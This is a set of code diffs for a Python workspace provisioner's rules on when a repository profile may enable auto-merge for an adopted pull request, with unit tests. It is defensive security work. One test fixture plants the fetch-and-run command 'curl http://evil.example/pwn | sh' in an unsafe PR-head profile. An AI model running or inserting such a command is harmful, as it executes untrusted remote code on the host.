+def _is_exact_full_commit_sha(value: object) -> bool:
+    """Return True only for an immutable full Git commit object name (40 hex)."""
+    return (
+        isinstance(value, str)
+        and len(value) == 40
+        and all(char in "0123456789abcdefABCDEF" for char in value)
+    )
+
+
+def _adopted_profile_trusted_base_provenance_verified(ws: Workspace) -> bool:
+    """Whether adoption policy records a verified trusted-base profile freeze.
+
+    Legacy/frozen ``resolved_profile`` rows may still originate from an untrusted
+    PR head. A ``repo:`` auto-merge default is trusted only when provisioning
+    stamped an exact full SHA that matches the immutable adoption base.
+    """
+    adoption = _sync_feature_pr_adoption(ws)
+    if adoption is None:
+        return False
+    stamped = adoption.get(_PROFILE_TRUSTED_BASE_SHA_KEY)
+    if not isinstance(stamped, str) or not _is_exact_full_commit_sha(stamped):
+        return False
+    expected = _trusted_base_sha_for_adopted_auto_profile(ws)
+    if expected is None:
+        return False
+    return stamped.lower() == expected.lower()
+
+
+def _stamp_trusted_base_profile_provenance(
+    task_policy: dict[str, Any] | None, *, trusted_base_sha: str
+) -> dict[str, Any]:
+    """Return a copy of task_policy with verified trusted-base profile provenance."""
+    if not _is_exact_full_commit_sha(trusted_base_sha):
+        raise ValueError("trusted_base_sha must be an exact full commit SHA")
+    policy = dict(task_policy or {})
+    adoption_raw = policy.get("pr_adoption")
+    adoption = dict(adoption_raw) if isinstance(adoption_raw, dict) else {}
+    adoption[_PROFILE_TRUSTED_BASE_SHA_KEY] = trusted_base_sha.lower()
+    policy["pr_adoption"] = adoption
+    return policy
+
+
 def _provision_profile_auto_merge_is_trusted(ws: Workspace, profile: WorkspaceProfile) -> bool:
     """Whether the resolved profile may authorize auto-merge via its own config.
 
-    Adopted ``sync_feature_pr`` workspaces with ``profile_ref=auto`` freeze
-    ``resolved_profile`` from the immutable adopted target-base revision, not the
-    PR head. A ``repo:`` ``monitor.auto_merge`` block is therefore operator/base-
-    controlled (same trust boundary as ordinary feature workspaces) and may
-    authorize auto-merge when intent is unset. Explicit operator intent still
-    overrides. Fail-closed trusted-base resolution elsewhere must never fall back
-    to PR-head profile content for that path.
+    Adopting a feature PR checks out the PR head (``refs/pull/<n>/head``), so a
+    ``monitor.auto_merge`` block read from that checkout's ``.awf/workspace.yml``
+    (profile ``source`` ``repo:<path>``) is controlled by the — possibly external —
+    PR author. Honouring it would let a PR enable its own auto-merge once the
+    remaining gates pass, contradicting "AWF owns merge safety" (AGENTS.md).
+
+    Legacy/frozen ``resolved_profile`` may still originate from an untrusted PR
+    head even after trusted-base resolve landed. Preserve the explicit-operator
+    auto-merge requirement for ``repo:`` sources on ``sync_feature_pr`` unless
+    trusted-base provenance is explicit and verified on the adoption policy.
+    Operator-supplied inline profiles and every non-adoption task kind remain
+    trusted.
     """
-    del ws, profile
-    return True
+    if ws.task_kind != "sync_feature_pr":
+        return True
+    if not (profile.source or "").startswith("repo:"):
+        return True
+    return _adopted_profile_trusted_base_provenance_verified(ws)
 
 
 def _release_sync_source_branch(ws: Workspace) -> str | None:
@@ -317,20 +370,26 @@ def _trusted_base_profile_worktree_id(workspace_id: str) -> str:
 def _trusted_base_sha_for_adopted_auto_profile(ws: Workspace) -> str | None:
     """Return the immutable adopted target-base SHA for auto profile provenance.
 
-    Prefer the workspace ``base_commit`` persisted at adoption time; fall back to
-    ``task_policy.pr_adoption.base_sha``. Do **not** use a retained merge-base —
-    that tip is only for orphan recovery after an unrebased head and is not the
-    adoption trust boundary for profile content.
+    Prefer ``task_policy.pr_adoption.base_sha`` (immutable adoption provenance).
+    Fall back to ``workspace.base_commit`` only when adoption ``base_sha`` is
+    absent. After the first successful provision, ``base_commit`` may be
+    overwritten with a retained merge-base for unrebased heads — that tip is
+    only for orphan recovery and must not redefine the profile trust boundary.
+
+    Only an exact immutable full commit SHA (40 hex) is accepted; short SHAs,
+    refs, and other peelable names are rejected fail-closed.
     """
-    for candidate in (ws.base_commit,):
-        if isinstance(candidate, str) and candidate.strip():
-            return candidate.strip()
+    candidates: list[object] = []
     adoption = _sync_feature_pr_adoption(ws)
-    if adoption is None:
-        return None
-    base_sha = adoption.get("base_sha")
-    if isinstance(base_sha, str) and base_sha.strip():
-        return base_sha.strip()
+    if adoption is not None:
+        candidates.append(adoption.get("base_sha"))
+    candidates.append(ws.base_commit)
+    for candidate in candidates:
+        if not isinstance(candidate, str):
+            continue
+        cleaned = candidate.strip()
+        if _is_exact_full_commit_sha(cleaned):
+            return cleaned.lower()
     return None
 
 

--- a/src/awf/node/provisioner_helpers.py
+++ b/src/awf/node/provisioner_helpers.py
@@ -206,18 +206,16 @@ def _provision_remote_push_branch(ws: Workspace) -> str | None:
 def _provision_profile_auto_merge_is_trusted(ws: Workspace, profile: WorkspaceProfile) -> bool:
     """Whether the resolved profile may authorize auto-merge via its own config.
 
-    Adopting a feature PR checks out the PR head (``refs/pull/<n>/head``), so a
-    ``monitor.auto_merge`` block read from that checkout's ``.awf/workspace.yml``
-    (profile ``source`` ``repo:<path>``) is controlled by the — possibly external —
-    PR author. Honouring it would let a PR enable its own auto-merge once the
-    remaining gates pass, contradicting "AWF owns merge safety" (AGENTS.md). Such a
-    config is untrusted: only an explicit operator intent may enable auto-merge for
-    it. An operator-supplied inline profile and every non-adoption task kind resolve
-    from a trusted source, so their ``monitor.auto_merge`` config is honoured.
+    Adopted ``sync_feature_pr`` workspaces with ``profile_ref=auto`` freeze
+    ``resolved_profile`` from the immutable adopted target-base revision, not the
+    PR head. A ``repo:`` ``monitor.auto_merge`` block is therefore operator/base-
+    controlled (same trust boundary as ordinary feature workspaces) and may
+    authorize auto-merge when intent is unset. Explicit operator intent still
+    overrides. Fail-closed trusted-base resolution elsewhere must never fall back
+    to PR-head profile content for that path.
     """
-    if ws.task_kind != "sync_feature_pr":
-        return True
-    return not (profile.source or "").startswith("repo:")
+    del ws, profile
+    return True
 
 
 def _release_sync_source_branch(ws: Workspace) -> str | None:
@@ -306,6 +304,52 @@ def _sync_feature_pr_adoption(ws: Workspace) -> dict[str, Any] | None:
     policy = ws.task_policy if isinstance(ws.task_policy, dict) else {}
     adoption = policy.get("pr_adoption")
     return adoption if isinstance(adoption, dict) else None
+
+
+_TRUSTED_BASE_PROFILE_WORKTREE_SUFFIX = "__trusted_base_profile"
+
+
+def _trusted_base_profile_worktree_id(workspace_id: str) -> str:
+    """Return the ephemeral worktree id used to materialize a trusted base profile."""
+    return f"{workspace_id}{_TRUSTED_BASE_PROFILE_WORKTREE_SUFFIX}"
+
+
+def _trusted_base_sha_for_adopted_auto_profile(ws: Workspace) -> str | None:
+    """Return the immutable adopted target-base SHA for auto profile provenance.
+
+    Prefer the workspace ``base_commit`` persisted at adoption time; fall back to
+    ``task_policy.pr_adoption.base_sha``. Do **not** use a retained merge-base —
+    that tip is only for orphan recovery after an unrebased head and is not the
+    adoption trust boundary for profile content.
+    """
+    for candidate in (ws.base_commit,):
+        if isinstance(candidate, str) and candidate.strip():
+            return candidate.strip()
+    adoption = _sync_feature_pr_adoption(ws)
+    if adoption is None:
+        return None
+    base_sha = adoption.get("base_sha")
+    if isinstance(base_sha, str) and base_sha.strip():
+        return base_sha.strip()
+    return None
+
+
+def _should_resolve_adopted_auto_profile_from_trusted_base(ws: Workspace) -> bool:
+    """Whether profile resolve for this workspace must use the trusted target base.
+
+    Applies only to adopted ``sync_feature_pr`` workspaces with no operator inline
+    profile and effective ``profile_ref`` unset/``auto``. Callers that already
+    hold a frozen ``resolved_profile`` (and are not rehydrating credentials)
+    skip resolve entirely and never need this predicate.
+    """
+    if ws.task_kind != "sync_feature_pr":
+        return False
+    if ws.requested_profile is not None:
+        return False
+    effective_ref = (ws.profile_ref or ws.env_profile or "auto").strip() or "auto"
+    if effective_ref != "auto":
+        return False
+    return _sync_feature_pr_adoption(ws) is not None
 
 
 def _positive_int(value: object) -> int | None:

--- a/tests/unit/node/test_git_manager_head_object.py
+++ b/tests/unit/node/test_git_manager_head_object.py
@@ -249,3 +249,49 @@ class TestVerifyHeadObjectExists:
 
         assert await git_module.verify_head_object_exists(plain) is True
         assert not alternates_path.exists()
+
+    @pytest.mark.unit
+    async def test_alternates_unlink_file_not_found_is_cleared(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+        origin_repo: Path,
+        work_dir: Path,
+    ) -> None:
+        """Race: alternates disappears between probe and unlink — treat as cleared."""
+        manager = GitManager(work_dir)
+        layout = await manager.add_worktree(
+            workspace_id="ws_alternates_race",
+            repo_url=str(origin_repo),
+            base_branch="development",
+            new_branch="awf/ws_alternates_race",
+        )
+
+        alternates_path = layout.mirror_path / "objects" / "info" / "alternates"
+        alternates_path.parent.mkdir(parents=True, exist_ok=True)
+        alternates_path.write_text("/tmp/awf-race-alternate-objects\n")
+
+        real_unlink = Path.unlink
+
+        def _unlink(self: Path, missing_ok: bool = False) -> None:
+            if self == alternates_path:
+                raise FileNotFoundError(str(self))
+            real_unlink(self, missing_ok=missing_ok)
+
+        monkeypatch.setattr(Path, "unlink", _unlink)
+
+        result = await git_module.verify_head_object_exists(layout.worktree_path)
+
+        assert result is True
+
+    @pytest.mark.unit
+    async def test_non_repository_path_has_no_alternates_and_fails_probe(
+        self,
+        tmp_path: Path,
+    ) -> None:
+        """Paths without a git dir skip alternates cleanup and fail the HEAD probe."""
+        from awf.node import git_manager_head_object as head_object
+
+        bare = tmp_path / "not-a-repo"
+        bare.mkdir()
+        assert head_object._repository_alternates_path_for_worktree(bare) is None
+        assert await git_module.verify_head_object_exists(bare) is False

--- a/tests/unit/node/test_git_manager_head_object.py
+++ b/tests/unit/node/test_git_manager_head_object.py
@@ -221,3 +221,31 @@ class TestVerifyHeadObjectExists:
 
         assert result is False
         assert alternates_path.exists()
+
+    @pytest.mark.unit
+    async def test_plain_git_dir_uses_local_repository_alternates(
+        self,
+        origin_repo: Path,
+        tmp_path: Path,
+    ) -> None:
+        """Non-linked checkouts (``.git`` directory) still clear local alternates."""
+        from awf.node import git_manager_head_object as head_object
+
+        plain = tmp_path / "plain-clone"
+        subprocess.run(
+            ["git", "clone", "--quiet", str(origin_repo), str(plain)],
+            check=True,
+            capture_output=True,
+        )
+        git_dir = plain / ".git"
+        assert git_dir.is_dir()
+        assert head_object._repository_alternates_path_for_worktree(plain) == (
+            git_dir / "objects" / "info" / "alternates"
+        )
+
+        alternates_path = git_dir / "objects" / "info" / "alternates"
+        alternates_path.parent.mkdir(parents=True, exist_ok=True)
+        alternates_path.write_text("/tmp/awf-unused-alternate-objects\n")
+
+        assert await git_module.verify_head_object_exists(plain) is True
+        assert not alternates_path.exists()

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
@@ -26,8 +26,11 @@ from awf.db.session import make_session_factory
 from awf.node.git_manager import GitManager, GitOperationError, WorktreeLayout
 from awf.node.provisioner import Provisioner, ProvisionerConfig
 from awf.node.provisioner_helpers import (
+    _PROFILE_TRUSTED_BASE_SHA_KEY,
+    _is_exact_full_commit_sha,
     _provision_profile_auto_merge_is_trusted,
     _should_resolve_adopted_auto_profile_from_trusted_base,
+    _stamp_trusted_base_profile_provenance,
     _trusted_base_profile_worktree_id,
     _trusted_base_sha_for_adopted_auto_profile,
 )
@@ -180,10 +183,14 @@ def test_trusted_base_profile_helpers() -> None:
         profile_ref="auto",
         task_policy={"pr_adoption": {"base_sha": "a" * 40, "head_ref": "feature/x"}},
     )
+    # Retained merge-base on base_commit must not override immutable adoption base_sha.
     ws.base_commit = "b" * 40
     assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is True
-    assert _trusted_base_sha_for_adopted_auto_profile(ws) == "b" * 40
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == "a" * 40
     assert _trusted_base_profile_worktree_id("ws_abc") == "ws_abc__trusted_base_profile"
+    assert _is_exact_full_commit_sha("a" * 40) is True
+    assert _is_exact_full_commit_sha("abc") is False
+    assert _is_exact_full_commit_sha("g" * 40) is False
 
     ws.requested_profile = {"name": "inline"}
     assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is False
@@ -206,12 +213,25 @@ def test_trusted_base_profile_helpers() -> None:
     ws.task_policy = {"pr_adoption": {"base_sha": "  "}}
     assert _trusted_base_sha_for_adopted_auto_profile(ws) is None
 
+    # Short / non-hex SHAs are rejected even when present.
+    ws.task_policy = {"pr_adoption": {"base_sha": "deadbeef"}}
+    ws.base_commit = None
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) is None
+    ws.base_commit = "abcd"
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) is None
+
+    # Without adoption base_sha, a full workspace.base_commit is still accepted.
+    ws.task_policy = {"pr_adoption": {"head_ref": "feature/x"}}
+    ws.base_commit = "d" * 40
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == "d" * 40
+
     assert _trusted_base_profile_worktree_id("ws_aaa") != _trusted_base_profile_worktree_id(
         "ws_bbb"
     )
 
 
-def test_base_resolved_repo_profile_is_trusted_for_auto_merge() -> None:
+def test_base_resolved_repo_profile_is_trusted_only_with_verified_provenance() -> None:
+    base_sha = "a" * 40
     ws = Workspace(
         id="ws_am",
         repo_url="https://github.com/example/app.git",
@@ -221,6 +241,7 @@ def test_base_resolved_repo_profile_is_trusted_for_auto_merge() -> None:
         agent="codex",
         test_commands=[],
         task_kind="sync_feature_pr",
+        task_policy={"pr_adoption": {"base_sha": base_sha, "head_ref": "feature/x"}},
     )
     profile = WorkspaceProfile.model_validate(
         {
@@ -229,7 +250,47 @@ def test_base_resolved_repo_profile_is_trusted_for_auto_merge() -> None:
             "monitor": {"auto_merge": {"default": True}},
         }
     )
+    # Legacy/frozen repo profile without stamped provenance stays untrusted.
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is False
+
+    ws.task_policy = _stamp_trusted_base_profile_provenance(
+        ws.task_policy if isinstance(ws.task_policy, dict) else None,
+        trusted_base_sha=base_sha,
+    )
+    assert ((ws.task_policy or {}).get("pr_adoption") or {}).get(
+        _PROFILE_TRUSTED_BASE_SHA_KEY
+    ) == base_sha
     assert _provision_profile_auto_merge_is_trusted(ws, profile) is True
+
+    # Mismatched stamp vs immutable adoption base fails closed.
+    ws.task_policy = _stamp_trusted_base_profile_provenance(
+        {"pr_adoption": {"base_sha": base_sha}},
+        trusted_base_sha="b" * 40,
+    )
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is False
+
+    inline = WorkspaceProfile.model_validate(
+        {"name": "inline", "source": "inline", "monitor": {"auto_merge": {"default": True}}}
+    )
+    assert _provision_profile_auto_merge_is_trusted(ws, inline) is True
+
+    ws.task_kind = "feature_branch_pr"
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is True
+
+
+@pytest.mark.asyncio
+async def test_git_manager_detached_worktree_rejects_short_sha(
+    git_manager: GitManager, tmp_path: Path
+) -> None:
+    repo, base_sha, _ = _build_stale_head_safe_base_origin(tmp_path / "git")
+    with pytest.raises(GitOperationError) as raised:
+        await git_manager.add_detached_worktree_at_commit(
+            workspace_id="ws_short__trusted_base_profile",
+            repo_url=str(repo),
+            commit_sha=base_sha[:12],
+        )
+    assert raised.value.reason_code == "GIT_BASE_BRANCH_MISSING"
+    assert "full commit SHA" in raised.value.stderr
 
 
 @pytest.mark.asyncio
@@ -329,6 +390,10 @@ async def test_adopted_auto_profile_resolves_from_trusted_base_not_stale_head(
         phases = reloaded.resolved_profile.get("phases") or {}
         setup = phases.get("setup") or []
         assert setup and "trusted-base-setup" in str(setup)
+        stamped = ((reloaded.task_policy or {}).get("pr_adoption") or {}).get(
+            _PROFILE_TRUSTED_BASE_SHA_KEY
+        )
+        assert stamped == base_sha.lower()
         assert reloaded.auto_merge is True
 
     assert _git_stdout(["rev-parse", "HEAD"], head_worktree) == head_sha
@@ -648,6 +713,106 @@ async def test_trusted_base_resolve_failure_reclaims_snapshot(
         assert reloaded is not None
         assert reloaded.status == WorkspaceStatus.failed.value
         assert reloaded.failure_reason == "profile_resolution_failure"
+
+
+@pytest.mark.asyncio
+async def test_trusted_base_snapshot_cleanup_failure_fails_closed_and_redacts(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    secret = "ghp_cleanupSecretTokenValue888"
+    real_add = git_manager.add_detached_worktree_at_commit
+
+    async def _tracking_add(*, workspace_id: str, repo_url: str, commit_sha: str) -> WorktreeLayout:
+        return await real_add(workspace_id=workspace_id, repo_url=repo_url, commit_sha=commit_sha)
+
+    async def _cleanup_boom(*, workspace_id: str, repo_url: str) -> None:
+        del workspace_id, repo_url
+        raise GitOperationError(
+            operation="worktree.remove",
+            returncode=1,
+            stdout="",
+            stderr=f"fatal: could not remove worktree using token {secret}",
+            reason_code="GIT_WORKTREE_REMOVE_FAILED",
+        )
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _tracking_add)
+    monkeypatch.setattr(git_manager, "remove_worktree", _cleanup_boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=base_sha)
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    with pytest.raises(GitOperationError) as raised:
+        await provisioner.provision(workspace_id)
+
+    assert raised.value.reason_code == "GIT_WORKTREE_REMOVE_FAILED"
+    assert secret not in raised.value.stderr
+    assert secret not in str(raised.value)
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.failed.value
+        message = reloaded.failure_message or ""
+        assert secret not in message
+        assert REDACTION_MARKER in message or "ghp_" not in message
+
+
+@pytest.mark.asyncio
+async def test_legacy_frozen_repo_profile_requires_explicit_auto_merge_intent(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+) -> None:
+    """Frozen PR-head repo profiles must not self-authorize auto-merge."""
+    origin_repo, base_sha, _ = origin_stale_head
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(
+                origin_repo,
+                base_sha=base_sha,
+                resolved_profile={
+                    "name": "legacy-head",
+                    "source": "repo:.awf/workspace.yml",
+                    "monitor": {"auto_merge": {"default": True}},
+                    "docker": {"mode": "none"},
+                },
+            )
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "legacy-head"
+        # No trusted-base provenance stamp on legacy freeze → DEFAULT_AUTO_MERGE.
+        assert reloaded.auto_merge is False
+        adoption = (reloaded.task_policy or {}).get("pr_adoption") or {}
+        assert _PROFILE_TRUSTED_BASE_SHA_KEY not in adoption
 
 
 @pytest.mark.asyncio

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
@@ -1,0 +1,698 @@
+"""Adopted sync_feature_pr auto profiles resolve from the immutable target base.
+
+Provisioning still checks out the PR head so monitor repairs can fast-forward
+push that branch. For ``profile_ref=auto`` with no operator inline profile,
+``resolved_profile`` must freeze from the adopted target-base SHA — never from
+the PR-head tree — so a stale/unsafe head profile cannot block bootstrap or
+self-authorize executable setup / auto-merge.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from collections.abc import AsyncIterator
+from pathlib import Path
+from typing import Any
+
+import pytest
+from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
+
+from awf.common.audit import REDACTION_MARKER
+from awf.common.auto_merge import AUTO_MERGE_INTENT_POLICY_KEY
+from awf.db.enums import WorkspaceStatus
+from awf.db.models import Workspace
+from awf.db.repositories import WorkspaceRepository
+from awf.db.session import make_session_factory
+from awf.node.git_manager import GitManager, GitOperationError, WorktreeLayout
+from awf.node.provisioner import Provisioner, ProvisionerConfig
+from awf.node.provisioner_helpers import (
+    _provision_profile_auto_merge_is_trusted,
+    _should_resolve_adopted_auto_profile_from_trusted_base,
+    _trusted_base_profile_worktree_id,
+    _trusted_base_sha_for_adopted_auto_profile,
+)
+from awf.profiles.models import WorkspaceProfile
+from awf.profiles.resolver import ProfileResolutionError, resolve_workspace_profile
+from tests.postgres import postgres_test_engine
+
+pytestmark = pytest.mark.unit
+
+
+def _git(args: list[str], cwd: Path) -> None:
+    subprocess.run(["git", *args], cwd=cwd, check=True, capture_output=True)
+
+
+def _git_stdout(args: list[str], cwd: Path) -> str:
+    return subprocess.run(
+        ["git", *args], cwd=cwd, check=True, capture_output=True, text=True
+    ).stdout.strip()
+
+
+def _write_repo_profile(
+    repo: Path,
+    *,
+    name: str,
+    auto_merge_default: bool = False,
+    setup_command: str = "echo ok",
+) -> None:
+    awf_dir = repo / ".awf"
+    awf_dir.mkdir(parents=True, exist_ok=True)
+    (awf_dir / "workspace.yml").write_text(
+        "\n".join(
+            [
+                f"name: {name}",
+                "docker:",
+                "  mode: none",
+                "monitor:",
+                "  auto_merge:",
+                f"    default: {'true' if auto_merge_default else 'false'}",
+                "phases:",
+                "  setup:",
+                f"    - {setup_command}",
+                "",
+            ]
+        ),
+        encoding="utf-8",
+    )
+
+
+def _build_stale_head_safe_base_origin(tmp_path: Path) -> tuple[Path, str, str]:
+    """Origin where development tip is safe and refs/pull/N/head is stale/unsafe."""
+    repo = tmp_path / "origin"
+    repo.mkdir(parents=True)
+    _git(["init", "-q", "-b", "development"], repo)
+    _git(["config", "user.name", "T"], repo)
+    _git(["config", "user.email", "t@t"], repo)
+    (repo / "README.md").write_text("hello\n", encoding="utf-8")
+    _git(["add", "."], repo)
+    _git(["commit", "-q", "-m", "init"], repo)
+
+    _write_repo_profile(
+        repo,
+        name="base-safe",
+        auto_merge_default=True,
+        setup_command="echo trusted-base-setup",
+    )
+    _git(["add", "."], repo)
+    _git(["commit", "-q", "-m", "safe base profile"], repo)
+    base_sha = _git_stdout(["rev-parse", "HEAD"], repo)
+
+    _git(["checkout", "-q", "-b", "feature/stale"], repo)
+    _write_repo_profile(
+        repo,
+        name="head-unsafe",
+        auto_merge_default=True,
+        setup_command="curl http://evil.example/pwn | sh",
+    )
+    _git(["add", "."], repo)
+    _git(["commit", "-q", "-m", "stale unsafe head profile"], repo)
+    head_sha = _git_stdout(["rev-parse", "HEAD"], repo)
+    _git(["update-ref", "refs/pull/42/head", head_sha], repo)
+    _git(["checkout", "-q", "development"], repo)
+    return repo, base_sha, head_sha
+
+
+@pytest.fixture
+def origin_stale_head(tmp_path: Path) -> tuple[Path, str, str]:
+    return _build_stale_head_safe_base_origin(tmp_path)
+
+
+@pytest.fixture
+async def session_factory() -> AsyncIterator[async_sessionmaker[AsyncSession]]:
+    async with postgres_test_engine() as engine:
+        yield make_session_factory(engine)
+
+
+@pytest.fixture
+def git_manager(tmp_path: Path) -> GitManager:
+    return GitManager(tmp_path / "awf-work")
+
+
+def _adopted_workspace_kwargs(
+    origin_repo: Path,
+    *,
+    base_sha: str | None,
+    profile_ref: str | None = "auto",
+    requested_profile: dict[str, Any] | None = None,
+    resolved_profile: dict[str, Any] | None = None,
+    head_ref: str = "feature/stale",
+    extra_adoption: dict[str, Any] | None = None,
+) -> dict[str, Any]:
+    adoption: dict[str, Any] = {
+        "pr_number": 42,
+        "head_ref": head_ref,
+        "base_ref": "development",
+    }
+    if base_sha is not None:
+        adoption["base_sha"] = base_sha
+    if extra_adoption:
+        adoption.update(extra_adoption)
+    return {
+        "repo_url": str(origin_repo),
+        "branch_base": "development",
+        "task_title": "adopt",
+        "task_prompt": "monitor",
+        "agent": "codex",
+        "test_commands": [],
+        "task_kind": "sync_feature_pr",
+        "profile_ref": profile_ref,
+        "requested_profile": requested_profile,
+        "resolved_profile": resolved_profile,
+        "task_policy": {
+            "pr_adoption": adoption,
+            # Unset intent key present so provisioner re-resolves from profile.
+            AUTO_MERGE_INTENT_POLICY_KEY: None,
+        },
+        "remote_push_branch": head_ref,
+    }
+
+
+def test_trusted_base_profile_helpers() -> None:
+    ws = Workspace(
+        id="ws_helper",
+        repo_url="https://github.com/example/app.git",
+        branch_base="development",
+        task_title="t",
+        task_prompt="p",
+        agent="codex",
+        test_commands=[],
+        task_kind="sync_feature_pr",
+        profile_ref="auto",
+        task_policy={"pr_adoption": {"base_sha": "a" * 40, "head_ref": "feature/x"}},
+    )
+    ws.base_commit = "b" * 40
+    assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is True
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == "b" * 40
+    assert _trusted_base_profile_worktree_id("ws_abc") == "ws_abc__trusted_base_profile"
+
+    ws.requested_profile = {"name": "inline"}
+    assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is False
+
+    ws.requested_profile = None
+    ws.profile_ref = "python"
+    assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is False
+
+    ws.profile_ref = "auto"
+    ws.task_kind = "feature_branch_pr"
+    assert _should_resolve_adopted_auto_profile_from_trusted_base(ws) is False
+
+    ws.task_kind = "sync_feature_pr"
+    # Frozen resolved_profile is skipped by the provisioner before resolve; the
+    # helper itself describes the adoption+auto trust boundary only.
+    ws.base_commit = None
+    ws.task_policy = {"pr_adoption": {"base_sha": "c" * 40}}
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == "c" * 40
+
+    ws.task_policy = {"pr_adoption": {"base_sha": "  "}}
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) is None
+
+    assert _trusted_base_profile_worktree_id("ws_aaa") != _trusted_base_profile_worktree_id(
+        "ws_bbb"
+    )
+
+
+def test_base_resolved_repo_profile_is_trusted_for_auto_merge() -> None:
+    ws = Workspace(
+        id="ws_am",
+        repo_url="https://github.com/example/app.git",
+        branch_base="development",
+        task_title="t",
+        task_prompt="p",
+        agent="codex",
+        test_commands=[],
+        task_kind="sync_feature_pr",
+    )
+    profile = WorkspaceProfile.model_validate(
+        {
+            "name": "base-safe",
+            "source": "repo:.awf/workspace.yml",
+            "monitor": {"auto_merge": {"default": True}},
+        }
+    )
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is True
+
+
+@pytest.mark.asyncio
+async def test_git_manager_detached_worktree_at_commit_add_and_remove(
+    git_manager: GitManager, tmp_path: Path
+) -> None:
+    repo, base_sha, _head_sha = _build_stale_head_safe_base_origin(tmp_path / "git")
+    snap_id = "ws_snap1__trusted_base_profile"
+    layout = await git_manager.add_detached_worktree_at_commit(
+        workspace_id=snap_id,
+        repo_url=str(repo),
+        commit_sha=base_sha,
+    )
+    assert layout.worktree_path.is_dir()
+    assert (
+        (layout.worktree_path / ".awf" / "workspace.yml")
+        .read_text(encoding="utf-8")
+        .startswith("name: base-safe")
+    )
+    assert _git_stdout(["rev-parse", "HEAD"], layout.worktree_path) == base_sha
+    symbolic = subprocess.run(
+        ["git", "-C", str(layout.worktree_path), "symbolic-ref", "-q", "HEAD"],
+        capture_output=True,
+        text=True,
+        check=False,
+    )
+    assert symbolic.returncode != 0
+
+    await git_manager.remove_worktree(workspace_id=snap_id, repo_url=str(repo))
+    assert not layout.worktree_path.exists()
+
+
+@pytest.mark.asyncio
+async def test_git_manager_detached_worktree_collision_fails_closed(
+    git_manager: GitManager, tmp_path: Path
+) -> None:
+    repo, base_sha, _ = _build_stale_head_safe_base_origin(tmp_path / "git")
+    snap_id = "ws_snap2__trusted_base_profile"
+    await git_manager.add_detached_worktree_at_commit(
+        workspace_id=snap_id, repo_url=str(repo), commit_sha=base_sha
+    )
+    with pytest.raises(GitOperationError) as raised:
+        await git_manager.add_detached_worktree_at_commit(
+            workspace_id=snap_id, repo_url=str(repo), commit_sha=base_sha
+        )
+    assert raised.value.reason_code == "GIT_WORKTREE_ALREADY_EXISTS"
+
+
+@pytest.mark.asyncio
+async def test_adopted_auto_profile_resolves_from_trusted_base_not_stale_head(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, head_sha = origin_stale_head
+    resolve_paths: list[Path] = []
+    real_resolve = resolve_workspace_profile
+
+    def _spy_resolve(**kwargs: Any) -> Any:
+        path = kwargs.get("worktree_path")
+        if isinstance(path, Path):
+            resolve_paths.append(path)
+        return real_resolve(**kwargs)
+
+    monkeypatch.setattr("awf.node.provisioner.resolve_workspace_profile", _spy_resolve)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=base_sha)
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+
+    head_worktree = git_manager.get_worktree_path(workspace_id)
+    snap_id = _trusted_base_profile_worktree_id(workspace_id)
+    snap_path = git_manager.get_worktree_path(snap_id)
+
+    async with session_factory() as s:
